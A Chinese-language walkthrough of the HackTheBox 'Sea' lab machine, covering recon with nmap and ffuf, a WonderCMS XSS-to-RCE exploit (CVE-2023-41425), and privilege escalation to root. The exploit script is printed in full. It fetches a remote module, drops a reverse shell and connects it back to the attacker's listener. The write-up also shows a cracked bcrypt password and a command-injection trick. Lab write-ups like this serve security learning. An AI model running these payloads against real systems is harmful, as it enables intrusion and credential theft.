HackTheBox-Machines Sea Writeup

Exploitation

先 nmap 看一下：

└─$ nmap -sV 10.10.11.28
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-15 00:29 CST
Nmap scan report for 10.10.11.28
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.39 seconds

有 22 跟 80 port。
用 whatweb 看一下，沒看到 hostname，用瀏覽器逛了一下看到 http://sea.htb/contact.php，把 hostname 加到 /etc/hosts：

└──╼ [★]$ echo "10.10.11.28 sea.htb" | sudo tee -a /etc/hosts 
10.10.11.28 sea.htb

來掃一下路徑：

└──╼ [★]$ ffuf -u http://sea.htb/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://sea.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

# Priority ordered case sensative list, where entries were found  [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 94ms]
#                       [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 95ms]
# directory-list-2.3-medium.txt [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 96ms]
# Attribution-Share Alike 3.0 License. To view a copy of this  [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 191ms]
#                       [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 285ms]
# Copyright 2007 James Fisher [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 328ms]
#                       [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 378ms]
# or send a letter to Creative Commons, 171 Second Street,  [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 422ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 516ms]
0                       [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 93ms]
themes                  [Status: 301, Size: 230, Words: 14, Lines: 8, Duration: 93ms]
#                       [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 941ms]
data                    [Status: 301, Size: 228, Words: 14, Lines: 8, Duration: 93ms]
                        [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 3404ms]
home                    [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 3404ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/  [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 3404ms]
# This work is licensed under the Creative Commons  [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 2335ms]
# on atleast 2 different hosts [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 3502ms]
plugins                 [Status: 301, Size: 231, Words: 14, Lines: 8, Duration: 92ms]
messages                [Status: 301, Size: 232, Words: 14, Lines: 8, Duration: 92ms]
404                     [Status: 200, Size: 3341, Words: 530, Lines: 85, Duration: 93ms]

找到一些會 redirect 的路徑，再往下掃看看：

└──╼ [★]$ ffuf -u http://sea.htb/themes/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://sea.htb/themes/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

404                     [Status: 200, Size: 3341, Words: 530, Lines: 85, Duration: 92ms]
%20                     [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 92ms]
bike                    [Status: 301, Size: 235, Words: 14, Lines: 8, Duration: 111ms]
video games             [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 96ms]
spyware doctor          [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 92ms]
4%20Color%2099%20IT2    [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 93ms]

看到 bike 會 redirect，再往下掃看看：

└──╼ [★]$ ffuf -u http://sea.htb/themes/bike/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://sea.htb/themes/bike/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

img                     [Status: 301, Size: 239, Words: 14, Lines: 8, Duration: 94ms]
                        [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 94ms]
# Attribution-Share Alike 3.0 License. To view a copy of this  [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 95ms]
# Priority ordered case sensative list, where entries were found  [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 95ms]
home                    [Status: 200, Size: 3650, Words: 582, Lines: 87, Duration: 95ms]
#                       [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 788ms]
#                       [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 1791ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 1791ms]
version                 [Status: 200, Size: 6, Words: 1, Lines: 2, Duration: 93ms]
# or send a letter to Creative Commons, 171 Second Street,  [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 2792ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/  [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 2794ms]
# on atleast 2 different hosts [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 3796ms]
# This work is licensed under the Creative Commons  [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 3797ms]
# directory-list-2.3-medium.txt [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 3801ms]
# Copyright 2007 James Fisher [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 3802ms]
#                       [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 3805ms]
css                     [Status: 301, Size: 239, Words: 14, Lines: 8, Duration: 93ms]
#                       [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 4804ms]
summary                 [Status: 200, Size: 66, Words: 9, Lines: 2, Duration: 92ms]
404                     [Status: 200, Size: 3341, Words: 530, Lines: 85, Duration: 93ms]
LICENSE                 [Status: 200, Size: 1067, Words: 152, Lines: 22, Duration: 98ms]
%20                     [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 98ms]
video games             [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 96ms]
spyware doctor          [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 95ms]
4%20Color%2099%20IT2    [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 96ms]
nero 7                  [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 93ms]
cell phones             [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 93ms]

有料，嘗試訪問一下 summary 還有 LICENSE 會看到：


這讓我懷疑這個路徑下有其他 git 相關的路徑，我們打開 burp 方便我們手動測試，結果：

找到 README.md …
上網查一下什麼是 WonderCMS：

WonderCMS is an extremely small flat file CMS. It’s fast, responsive and doesn’t require any configuration. It provides a simple way for creating and editing websites.

看起來是一個輕量化的 CMS，為了搜尋 WonderCMS 有沒有可以利用的 CVE，我重新執行 ffuf 去整理可以利用的資訊，找到了 version：

└──╼ [★]$ ffuf -u http://sea.htb/themes/bike/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | grep "Status: 200"

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://sea.htb/themes/bike/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

summary                 [Status: 200, Size: 66, Words: 9, Lines: 2, Duration: 92ms]
version                 [Status: 200, Size: 6, Words: 1, Lines: 2, Duration: 4979ms]
404                     [Status: 200, Size: 3341, Words: 530, Lines: 85, Duration: 97ms]
LICENSE                 [Status: 200, Size: 1067, Words: 152, Lines: 22, Duration: 93ms]
[WARN] Caught keyboard interrupt (Ctrl-C)

找到版本是 3.2.0：

└──╼ [★]$ curl http://sea.htb/themes/bike/version
3.2.0

相關 exploit：
https://github.com/prodigiousMind/CVE-2023-41425

└──╼ [★]$ python3 exploit.py 
usage: python3 exploit.py loginURL IP_Address Port
example: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252
┌─[sg-vip-1]─[10.10.14.11]─[kazma@htb-dcoyyfmrg1]─[~/CVE-2023-41425]
└──╼ [★]$ python3 exploit.py http://sea.htb/themes/ 10.10.14.11 4444
[+] xss.js is created
[+] execute the below command in another terminal

----------------------------
nc -lvp 4444
----------------------------

send the below link to admin:

----------------------------
http://sea.htb/themes/"></form><script+src="http://10.10.14.11:8000/xss.js"></script><form+action="
----------------------------


starting HTTP server to allow the access to xss.js
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

然後看了 github README.md 的敘述會發現他是 one click RCE 所以我們看一下他 exploit 模擬一下那個 click：

└──╼ [★]$ cat exploit.py 
# Author: prodigiousMind
# Exploit: Wondercms 4.3.2 XSS to RCE


import sys
import requests
import os
import bs4

if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")
else:
  data = '''
var url = "'''+str(sys.argv[1])+'''";
if (url.endsWith("/")) {
 url = url.slice(0, -1);
}
var urlWithoutLog = url.split("/").slice(0, -1).join("/");
var urlWithoutLogBase = new URL(urlWithoutLog).pathname; 
var token = document.querySelectorAll('[name="token"]')[0].value;
var urlRev = urlWithoutLogBase+"/?installModule=https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=" + token;
var xhr3 = new XMLHttpRequest();
xhr3.withCredentials = true;
xhr3.open("GET", urlRev);
xhr3.send();
xhr3.onload = function() {
 if (xhr3.status == 200) {
   var xhr4 = new XMLHttpRequest();
   xhr4.withCredentials = true;
   xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");
   xhr4.send();
   xhr4.onload = function() {
     if (xhr4.status == 200) {
       var ip = "'''+str(sys.argv[2])+'''";
       var port = "'''+str(sys.argv[3])+'''";
       var xhr5 = new XMLHttpRequest();
       xhr5.withCredentials = true;
       xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);
       xhr5.send();
       
     }
   };
 }
};
'''
  try:
    open("xss.js","w").write(data)
    print("[+] xss.js is created")
    print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))
    print("----------------------------\n")
    XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""
    XSSlink = XSSlink.strip(" ")
    print("send the below link to admin:\n\n----------------------------\n"+XSSlink)
    print("----------------------------\n")

    print("\nstarting HTTP server to allow the access to xss.js")
    os.system("python3 -m http.server\n")
  except: print(data,"\n","//write this to a file")
┌─[sg-vip-1]─[10.10.14.11]─[kazma@htb-dcoyyfmrg1]─[~/CVE-2023-41425]
└──╼ [★]$ curl 'http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.11&lport=4444'

成功拿到 revshell：

└──╼ [★]$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.28] 59906
Linux sea 5.4.0-190-generic #210-Ubuntu SMP Fri Jul 5 17:03:38 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 05:16:31 up 12:48,  0 users,  load average: 1.05, 0.80, 0.77
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 

跟之前一樣可以翻到下面 database 裡面有 password：

www-data@sea:/var/www/sea/data$ cat database.js | grep password
cat database.js | grep password
        "password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",

用 chatGPT 查一下知道是 bcrypt，可以用貓咪爆破：

└─$ echo -n '$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q' > hash.txt

┌──(kazma㉿kali)-[~]
└─$ hashcat -m 3200 -a 0 -o output.txt hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i5-12400, 2918/5901 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec


Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM...DnXm4q
Time.Started.....: Thu Aug 15 14:53:15 2024 (20 secs)
Time.Estimated...: Thu Aug 15 14:53:35 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      151 H/s (6.55ms) @ Accel:8 Loops:16 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3072/14344385 (0.02%)
Rejected.........: 0/3072 (0.00%)
Restore.Point....: 3008/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1008-1024
Candidate.Engine.: Device Generator
Candidates.#1....: blessing -> dangerous

Started: Thu Aug 15 14:52:49 2024
Stopped: Thu Aug 15 14:53:37 2024

結果在 output.txt:

└─$ cat output.txt
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q:mychemicalromance

密碼是 mychemicalromance

www-data@sea:/var/www/sea/data$ su amay 
su amay 
Password: mychemicalromance

amay@sea:/var/www/sea/data$ cat /home/amay/user.txt
cat /home/amay/user.txt
6f5a0978cb9ab...

拿下 user…
逛了兩圈還是沒想到怎麼提權後，參考網路上的解答看一下本機現在有的服務：

amay@sea:~$ netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:45763         0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -

會發現他本地有其他的服務例如 8080 port，我們可以透過下面的方式把流量轉到我們的 48763 port 上，就可以看到他的網頁服務長怎樣：

└──╼ [★]$ ssh -L 48763:localhost:8080 [email protected]
The authenticity of host '10.10.11.28 (10.10.11.28)' can't be established.
ED25519 key fingerprint is SHA256:xC5wFVdcixOCmr5pOw8Tm4AajGSMT3j5Q4wL6/ZQg7A.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.28' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-190-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Thu 15 Aug 2024 08:29:06 AM UTC

  System load:  0.42              Processes:             259
  Usage of /:   73.9% of 6.51GB   Users logged in:       1
  Memory usage: 22%               IPv4 address for eth0: 10.10.11.28
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Aug 15 08:00:42 2024 from 10.10.14.11
amay@sea:~$ 

到我們本地的瀏覽器看就會發現 48763 跳出一個登入頁面：

那我們輸入我們目前知道的唯一一組帳號密碼就可以登進去：

進去後會看到一個 system monitor 的頁面，點 Analyze 可以看到 access.log 的 content 被印出來，那我們嘗試能不能透過 burp 讀 /root/root.txt 的內容：

結果 response 說沒有可疑流量所以他不印。
因為在 access log 有看到我們前面 ffuf 的指令貌似會被視為惡意指令，所以瞎亂測試之後發現把指令截斷再加上 ffuf 就會被判斷是可疑流量：

莫名其妙就拿到 root flag 了…
原本以為他是去判斷檔案裡面的內容，沒想到把指令加在後面也有用。

Reference

https://medium.com/@haroonharoon17/sea-hack-the-box-walk-through-77b1030ce0bc
https://natro92.fun/posts/211ccf29/#%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F-%E6%9D%83%E9%99%90%E5%80%9F%E7%94%A8

Pwned !!!